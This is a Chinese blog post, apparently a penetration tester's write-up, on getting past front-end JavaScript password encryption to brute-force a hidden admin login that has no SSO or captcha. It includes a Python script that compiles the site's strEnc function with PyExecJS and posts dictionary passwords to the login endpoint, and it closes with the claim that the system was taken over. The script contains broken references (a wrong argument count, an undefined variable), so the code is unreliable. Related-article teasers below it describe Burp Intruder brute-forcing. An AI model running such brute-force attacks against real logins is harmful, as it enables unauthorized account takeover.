form标签的action之前 加密_口令爆破之突破前端JS加密

最新推荐文章于 2023-04-07 14:23:51 发布
最新推荐文章于 2023-04-07 14:23:51 发布
阅读量271 收藏
点赞数
文章标签: form标签的action之前 加密 js里面把密码encode sources修改js代码

0x00 前言

近期安全测试时发现一个系统前台使用了SSO,但是在比较隐蔽API中发现了后台的登录接口,该接口未使用SSO,同时没有图形验证码等校验,通过分析最终爆破进入后台。

0x01 确认攻击途径

通过信息搜集找到后台登录URL,由于URL比较敏感,这里以 admin/login替代,尝试登录发现没有图形验证码等校验

130a26981ec73736d440877a91b72352.png

通过BurpSuite抓包发现密码字段被加密了

18951dfb4e00184139222aa615556cac.png

根据回显不同,可进行口令爆破。

攻击思路:

  1. 通过回显不同获取存在的账号

  2. 分析加密方法

  3. 使用加密算法加密密码字典

  4. 脚本发包爆破

这里也可以使用Selenium一把梭暴力解决,但是不建议,如果实在没折的话再考虑此方法。

0x02 分析加密方法

加密参数为 u_pwd,在html文件中搜索该特殊字符

fbd71d986dacdbd20939ce8ab8c22de9.png

可以看到加密算法是将 u_pwdu_name拼接之后使用 strEnc函数处理,然后再和一个随机16位字符串拼接。

测试加密算法

复制定位到的 strEnc函数JS代码,以Chrome为例。F12->Sources->Overrides->右键Snippets->粘贴

376f527c984c22fa2bbd890d4f2aaa1d.png

在新建的 snippet上右键>Run

649a7e033412d3941d5665cc20ec4f4d.png

输入密码测试

9253f93e7f5eb16bb3454207dbe6eb25.png

OK,加密代码找到了,运行对应的加密JS代码即可获取对应密码的加密字符串。

0x03 攻击测试

这里有多种途径,官方推荐PyV8、Node.js、PhantomJS、Nashorn,之前跟爬虫的大哥学习的时候发现他们好多使用的PyExecJS,所以也用这个试试,有兴趣的可以搜搜对应的优缺点。

安装 Node.js之后 pip installPyExecJS即可

4f05a91555e87f5478a2e71f176c3815.png

脚本爆破

import requests

import execjs

import json

def gen_encode_pass(user_name, user_password):

with open("/Users/w2n1ck/Desktop/des.js", "r") as f:

data_func = f.read()

ctx = execjs.compile(data_func)

up = ctx.call('strEnc', user_password, user_name)

rand = ctx.call('randomString', 16)

password = str(up) + str(rand)

print('encode: u_password:',password)

return password

_url = "https://admin.baidu.com:443/admin/login"

_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Referer": "https://admin.baidu.cn/admin/login", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "u_token": "", "X-Requested-With": "XMLHttpRequest", "Connection": "close"}

_data = {"u_name": "admin"}

pass_dict = open('/Users/w2n1ck/Desktop/admin_pass.txt', 'r')

for p in pass_dict.readlines():

p = str(p.strip())

print("decode: " + p)

password = gen_encode_pass(p)

burp0_data['u_pwd'] = password

resp = requests.post(_url, headers=_headers, data=_data)

con = json.loads(resp.content)

if 'false' in str(con):

print(con)

pass_dict.close()

通过前期的确定存在的用户名进行社工口令针对性爆破

31960af73c3b54462dc059b9ad2a2a29.png

脚本启动,打卡,下班

e3cf37d2d985f0b508be9e10822c3858.png

第二天上班发现已有存在的账号密码,账号密码登录即可接管系统

3171b34fc3dbf70a737808215c36a187.png

参考文章:

https://juejin.im/post/5c8f15bde51d451d1118db99

619aebf9cd79271b7c93bbaea2a6bd7a.gif

weixin_39782573
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
form标签action之前 加密_简易加密解密软件
weixin_39524703的博客
10-21 119
hello大家好,今天我们来利用VB制作一款简易的加密、解密软件。在计算机技术高度发达的今天,信息的安全就显得尤为重要了。因此,对信息的加密和解密也就自然而然成为一项重要的工作。那么,我们就从最简单的加密和解密做起,希望能够为大家打开信息加密和解密的大门。关键技术本例加密的思路是:将需要加密的字母,翻译为ASCII码,然后加上一个固定的值后(密钥),转换为新的ASCII码,再将这个新的A...
关于burp suite工具的弱口令爆破
sworddancing is the best one
07-18 6343
并非所有的弱口令都可以爆破,只有那些明文密码才可以利用burp suite工具进行侵入爆破,首先将数据包拦截,查看其密码是否为明文,如果是明文,才可进行一下步骤,如果不是明文密码,本文则无法实现密码的1爆破。 在proxy下action选项卡选择sent to intruder(将拦截到的数据包传送到intruder工具下),打开position,先clear清空一下默认所选中的爆破对象,然后选...
利用Burpsuite密码爆破
不忘初心,护天下安全!
11-29 2964
参考:https://blog.csdn.net/weixin_38948797/article/details/79111566 https://blog.csdn.net/huilan_same/article/details/64124895 https://blog.csdn.net/huilan_same/article/details/67671531?utm_source=gol...
CTF burpsuite弱口令爆破四个模式
东隅的博客
01-01 708
一 Sniper(狙击手模式) 狙击手模式使用一组payload集合,它一次只使用一个payload位置,假设你标记了两个位置“A”和“B”,payload值为“1”和“2”,那么它攻击会形成以下组合(除原始数据外): attack NO. location A location B 1 1 no replace 2 2 no replace 3 no replace 1 4 no replace 2 二Battering
Web暴力破解--前端JS表单加密进行爆破
2301_77300311的博客
04-07 540
从前台到后台是一个质的突破,本文主要对很多web 在登陆的过程中会用 js 对密码进行加密传输,梳理了一下web暴力猜解的技巧。常见的js实现加密的方式有:md5、base64、shal,写了一个简单的demo作为测试。2、分别选择用户名字典和密码字典,在设置密码字典的时候,选择md5加密方式对密码字段进行加密处理。四种爆破方式:单一字典爆破、多字段相同字典爆破、多字典位置对应爆破、聚合式爆破。最常用的应该是在爆破用户名和密码的时候,使用聚合方式枚举了。0x03 Web暴力猜解。方式二:Python脚本。
TRRAINETChrono_pushol6_Form_action_chronometer_
10-01
Form with chronometer layout and action buttons
制作加密文本文件程序.rar_button_加密 解密
09-21
制作加密文本文件程序1.原理从源文本文件中按顺序读出每一个字符,然后把读出的字符转换为相应的ASCII码,将此ASCII码加上整数密钥Key,最后把所得结果再转回相应的字符并同时把它写入到另外一个文件中,这就是加密...
维吉尼亚算法_维吉尼亚加密算法_back_
09-30
The Guinness code is an encryption algorithm that uses a series of Caesar codes to form the alphabet of passwords. It is a simple form of multi table passwords.In order to make it clear we need to ...
Paint_form.rar_delphi form_delphi paint form_paint
09-23
Paint form automatic
nodejs中密码加密处理操作详解
12-30
本文实例讲述了nodejs中密码加密处理操作。分享给大家供大家参考,具体如下: 一、关于node加密模块crypto的介绍 其实就是使用MD5加密的,不太安全,在实际开发...form role=form method=post action=/regest> <di
利用burp suite进行弱口令爆破 (攻防世界web weak_auth)
Kni9hT's Blog
02-28 5000
终于刷到这种题了,做二进制的时候用过python爆破… 用burp suite跑字典还是第一次。 那就从这个简单的字典爆破开始吧。 利用工具: burp suite Blasting_dictionary-mastergithub字典 爆破环境: kali linux 正题开始 题目叫做weak_auth,翻译过来就是弱口令爆破 打开是一个登陆界面,username和password都使用a...
网安实训(六)| 利用Burpsuite代理并进行弱密码爆破
朔方鸟的博客
02-17 4804
Burpsuite是一个常用的web渗透软件,提供了一系列的有关web安全攻击的工具,本实验将使用该工具进行弱密码的爆破
Burpsuite技巧 | 之加密密码爆破、带验证码爆破
hackzkaq的博客
01-14 9084
更多黑客技能 公众号:暗网黑客 一、Burpsuite技巧之MD5加密密码爆破 关于Burp的安装包以及使用教程,可以查看之前分享的渗透测试神器|一文带你精通Burp(附下载) 因现在有很多后台都不再是明文传输,改成了各种各样的加密方式. 今天就拿MD5加密方式做一个演示,举一反三,希望对新手有用. 如图,MD5加密了密码,遇到这种后台,我们只需要稍微设置下 Burpsuite 就可以进行MD5加密密码爆破了哦 首先添加自己的字典,然后在下面添加负载处理,选择对应的加密方式即可. 效果如下: 二、.
BurpSuite8.2 -- 解决参数加密问题
weixin_41489908的博客
08-30 895
一、抓包分析,Authorization参数是加密的,带等号的考虑Base64加密 二、解密后发现正好是我们提交的账号和密码 三、将数据发送到爆破模块Intruder,把加密数据添加到可变参数 四、设置Payloads 1、设置payload类型为customiterator 2、设置三个位置内容凑成***:***的格式 3、将提交的参数信息进行Base64加密 4、发起攻击,有一条返回数据不一样,说明这个就是正确账号和密码 禁止非法,后果自负 .
绕过前端加密进行爆破(附脚本)
Matthew
11-20 5013
在渗透的过程中,有时候会遇到密码在前端加密了,为我们爆破提高了难度。加密js脚本自定义函数加密,burp里面的一些加密函数就满足不了我们的需求。如下所示,密码为admin123,加密的效果如下: 可以看到加密的函数主要是encode,所以每个密码都由自定义函数加密。最近在实战过程中get到一个new trick,利用相应的工具或者模块执行该 js 文件,拿到输出结果即可,可以使用 python 自
RSA非对称加密算法(表单提交时,前端js加密,后端java解密)
tyjlearning的博客
03-29 1517
RSA非对称加密算法(表单提交时,前端js加密,后端java解密 非对称加密算法 需要的工具 前端jsp页面 js代码 加密解密的工具类 产生公钥的类 处理登陆请求的类 加密成功的密码 非对称加密算法 非对称加密算法是一种密钥的保密方法。 非对称加密算法需要两个密钥:公开密钥(publickey)和私有密钥(privatekey)。公开密钥与私有密钥是一对,如果用公开密钥对数据进行加密,只有用对应...
JavaScript-操作表单和前端加密
qq_61727355的博客
09-03 592
1.操作表单 表单是什么?form-----DOM树 文本框----text 下拉框----select 单选框----radio 多选框----checkbox 隐藏域----hidden 密码框----password … 表单的目的:提交信息 我们获得要提交的信息 写个表单 1)得到输入框的值 2)修改输入框的值 3)对于单选框和多选框,查看返回结果:
前端不用form标签
最新发布
06-10
前端调用后端 Python 函数时,如果使用 Ajax 技术来发送请求,就不需要使用 `<form>` 标签了。因为 Ajax 可以通过 JavaScript 代码直接获取前端页面中的数据,并将数据以指定的格式发送到后端 Python 函数的接口中。 如果你想通过表单提交的方式来调用后端 Python 函数,那么就需要使用 `<form>` 标签了。在表单中,需要设置 `action` 属性为后端 Python 函数的 URL,`method` 属性为 `POST`,然后在表单中添加需要传递给后端 Python 函数的参数。最后,添加一个提交按钮,当用户点击提交按钮时,表单会自动将数据发送到后端 Python 函数的接口中。不过在 layui 中,一般不使用表单来提交数据,而是使用 Ajax 来发送请求。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值